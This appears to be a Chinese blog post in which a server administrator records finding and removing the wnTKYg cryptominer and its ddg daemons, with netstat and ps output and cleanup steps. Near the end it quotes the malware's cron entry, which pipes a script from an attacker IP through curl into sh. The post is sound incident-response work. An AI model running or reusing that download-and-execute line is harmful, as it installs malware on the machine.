起因,阿里云多次提醒我的一台服务器有恶意发包行为,且给出了一些解决办法。之前也没太在意,就按照解决办法处理了一下。然后过一段时间,还是提示有此行为。

猜肯定是中了木马了,开始以为是被肉鸡了拿来做DDoS攻击别人了。今天去服务器上仔细看了一下。然后发现了问题究竟(目前猜应该如此,还等待观察)。

现将过程记录如下:

1、先查看一下端口情况,发现有些名为ddg.xxxx的进程很可疑。然后看了下远程的链接IP,美国、法国等地方,很奇怪。网上搜了一下,没什么结果。

[root@zhangtianguo ~]# netstat -anp

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name

tcp        0      0 0.0.0.0:22111           0.0.0.0:*               LISTEN      840/sshd

tcp        0      0 127.0.0.1:32000         0.0.0.0:*               LISTEN      27121/java

tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      20918/memcached

tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      813/nginx: worker p

tcp        0      0 0.0.0.0:81              0.0.0.0:*               LISTEN      1497/httpd

tcp        0      0 0.0.0.0:82              0.0.0.0:*               LISTEN      1497/httpd

tcp        0      0 0.0.0.0:83              0.0.0.0:*               LISTEN      1497/httpd

tcp        0      0 0.0.0.0:85              0.0.0.0:*               LISTEN      1497/httpd

tcp      401      0 我的IP:42388    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp        0      1 我的IP:43968    52.2.199.2:8443         SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:38258    54.222.159.38:8443      SYN_SENT    1620/ddg.1010

tcp      401      0 我的IP:41811    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp      401      0 我的IP:53489    140.205.140.205:80      CLOSE_WAIT  11393/AliYunDunUpda

tcp        0      0 我的IP:59795    202.181.169.98:8443     ESTABLISHED 25125/ddg.2011

tcp        0      0 我的IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg

tcp        0      1 我的IP:47592    106.75.74.11:9443       SYN_SENT    12799/ddg.1009

tcp      371      0 10.174.208.36:51087     100.100.25.3:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp        0      0 我的IP:40019    106.11.68.13:80         ESTABLISHED 11448/AliYunDun

tcp        0      0 127.0.0.1:32000         127.0.0.1:31001         ESTABLISHED 27119/wrapper

tcp        0      1 我的IP:39511    39.108.56.56:8443       SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:50528    121.69.45.254:8443      SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:51132    106.75.71.242:8443      SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:60425    120.77.46.195:8443      SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:54458    116.39.7.114:8443       SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:57546    54.183.178.110:8443     SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:57686    106.75.134.239:8443     SYN_SENT    1620/ddg.1010

tcp        0      1 我的IP:56848    61.65.191.22:8443       SYN_SENT    1620/ddg.1010

tcp      401      0 我的IP:52910    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda

tcp        0    604 我的IP:22111    27.10.185.19:63158      ESTABLISHED 19368/sshd: root@pt

tcp        0      1 我的IP:56357    165.225.157.157:8443    SYN_SENT    1620/ddg.1010

2、然后,看了下这个进程的具体情况,居然是在/tmp/下的进程,心中更多抑或:

[root@zhangtianguo ~]# ps aux | grep ddg

root      1620  0.1  0.7 209684 13688 ?        Sl   Jul12  78:05 /tmp/ddg.1010

root     12799  0.0  0.2 262816  5460 ?        Sl   Jul01   9:32 /tmp/ddg.1009

root     19576  0.0  0.0 112644   960 pts/1    S+   10:01   0:00 grep --color=auto ddg

root     25125  0.0  0.2 207236  5172 ?        Sl   Aug27   2:13 /tmp/ddg.2011

root     28248  0.0  0.2 207192  4520 ?        Sl   Jul27  38:09 /tmp/ddg.1021

3、再去看看/tmp/下的文件,只有一个ddg.2011的文件,当时就心想,肯定是这些进程运行后,又自动删除了文件,看时间,8月创建的时间的文件,全部统统rm掉:

[root@zhangtianguo tmp]# ll -ah

total 9.6M

drwxrwxrwt.  9 root root 4.0K Aug 29 10:02 .

drwxr-xr-x. 20 root root 4.0K Jun 30 18:04 ..

srwxr-xr-x   1 root root    0 Aug 28 12:53 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>

-rwxr-xr-x   1 root root 9.5M Aug 11 10:13 ddg.2011

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .font-unix

drwxr-xr-x   2 root root 4.0K Aug 17 10:07 hsperfdata_root

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .ICE-unix

drwx------   3 root root 4.0K Nov 26  2015 systemd-private-nwO9vi

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .Test-unix

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .X11-unix

drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .XIM-unix

4、再重复步骤1,查看端口情况,又发现了这个玩意儿,感觉不太正常(直觉):

tcp        0      0 我的IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg

5、一搜,原来居然是个挖矿的程序貌似。原来已经有不少人中招过了。解决办法也有很多人给出了,基本上就是:

先给redis的问题处理掉,改端口、加密码之类;

查看/root/.ssh/下的文件,是否有异常登陆信息,有的话删掉;

搜索wnTKYg的相关文件( find / -name *wnTKYg*),删掉;

删掉/tmp/下的异常文件(主要是ddg.xxxx之类的);

kill掉wnTKYg以及ddg.xxxx的进程;

还有个问题,这个程序有个自动任务,从木马服务器下载程序执行,也要删掉:

cd /var/spool/cron

ll -ah

rm -rf *

我查看这个目录时,发现里面的自动任务是这样的,好像是印度一个IP:

[root@zhangtianguo cron]# cat root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh

至此,完工。然后继续观察。

参考资料。感谢:

http://blog.csdn.net/u010789532/article/details/70528648

http://blog.csdn.net/zimou5581/article/details/73064878

记录清除wnTKYg挖矿工木马(守护进程ddg.xxxx)的过程的更多相关文章

  1. 清除wnTKYg 这个挖矿工木马的过程讲述

    由于工作需要,我由一个专业java开发工程师,渐渐的也成为了不专业的资深的运维工程师了.感慨一番,书归正传,下面就讲解wnTKYg如何清除.最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU ...

  2. 彻底清除Linux centos minerd木马

    前几天,公司两台linux服务器,一台访问速度很慢,cpu跑满,一台免密码登录失效,公钥文件被改写成redis的key.用htop命令查询发现了minerd木马进程,初步猜测是redis没有配访问权限 ...

  3. Unix环境高级编程(十三)守护进程

    守护进程也称为精灵进程是一种生存期较长的一种进程.它们独立于控制终端并且周期性的执行某种任务或等待处理某些发生的事件.他们常常在系统引导装入时启动,在系统关闭时终止.unix系统有很多守护进程,大多数 ...

  4. Linux网络编程学习(四) -----守护进程的建立(第三章)

    本文介绍一个例程daemon_init() #include <sys/types.h> #include <signal.h> #include <unistd.h&g ...

  5. Linux多任务编程之七:Linux守护进程及其基础实验(转)

    来源:CSDN  作者:王文松  转自Linux公社 ------------------------------------------------------------------------- ...

  6. Unix环境高级编程——守护进程记录总结(从基础到实现)

    一.概念及其特征 守护进程是系统中生存期较长的一种进程,常常在系统引导装入时启动,在系统关闭时终止,没有控制终端,在后台运行.守护进程脱离于终端是为了避免进程在执行过程中的信息在任何终端上显示并且进程 ...

  7. 笔记整理--Linux守护进程

    Linux多进程开发(三)进程创建之守护进程的学习 - _Liang_Happy_Life__Dream - 51CTO技术博客 - Google Chrome (2013/10/11 16:48:2 ...

  8. 编写Linux/Unix守护进程

    原文: http://www.cnblogs.com/haimingwey/archive/2012/04/25/2470190.html 守护进程在Linux/Unix系统中有着广泛的应用.有时,开 ...

  9. Linux 下Qt实现守护进程实例(转)

     原文地址:Linux守护进程的编程方法(含实例) 作者:lingdxuyan 参考文献 Linux信号列表(zz) Linux 守护进程的编程方法 linux上编写守护进程的例程 Linux下后台守 ...

随机推荐

  1. windows环境下pycharm如何设置Linux编码

    最近写代码一直在windows环境下,写完之后再传到Linux端就会出现代码格式错乱. 解决办法: 在windows端的pycharm代码格式设置为unix and os及可以解决这个问题. 如果你要 ...

  2. Hyperledger Fabric密码模块系列之BCCSP(二)

    上一篇简单介绍了bccsp包下面的目录结构,这一篇本来想讲sw的,忽然感觉少点什么,对哈,得先将下bccsp这个接口,sw只是个实现啊.

  3. net4log 添加自定义变量

    在log4net.config中 <parameter> <parameterName value="@czyid" /> <dbType value ...

  4. [转]Angular 4 *ngIf/Else

    本文转自:http://tylerscode.com/2017/03/angular-4-ngifelse/ As you may know it wasn’t that many months ag ...

  5. vuex学习及使用

    什么是vuex? 在SPA单页面组件的开发中vuex称为状态管理:简单的理解就是你在state中定义了一个数据之后,你可以在所在项目中的任何一个组件里进行获取.进行修改,并且你的修改可以得到全局的响应 ...

  6. 【shell编程】2、语法

    Linux 下执行.sh文件总是提示permission denied 如果你是root登陆的话(不是的话,切换到root用户,对*.sh赋可执行的权限) chmod 777 *.sh   or    ...

  7. 性能监控(2)–linux下的vmstat命令

    vmstat它可以统计CPU.内存使用情况.swap使用情况等信息.它还可以指定采样周期和次数.

  8. 无法安装程序包MiniProfiler

    抱歉,之前给错了解决问题的答案,今天来修改一下,时间:2018年9月25日23:19:02错误 无法安装程序包“MiniProfiler.EF6 4.0.138”.你正在尝试将此程序包安装到目标为“. ...

  9. 两个inline-block消除间距和对齐(vertical-align)

    一.神奇的两个inline-block 很初级的问题,无聊决定写一个故事. 故事的主人公很简单,两个inline-block元素.代码如下,为了看起来简单明了,写得很简陋.效果图如右.发现有两个问题. ...

  10. HDU4278

    Faulty Odometer Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others)T ...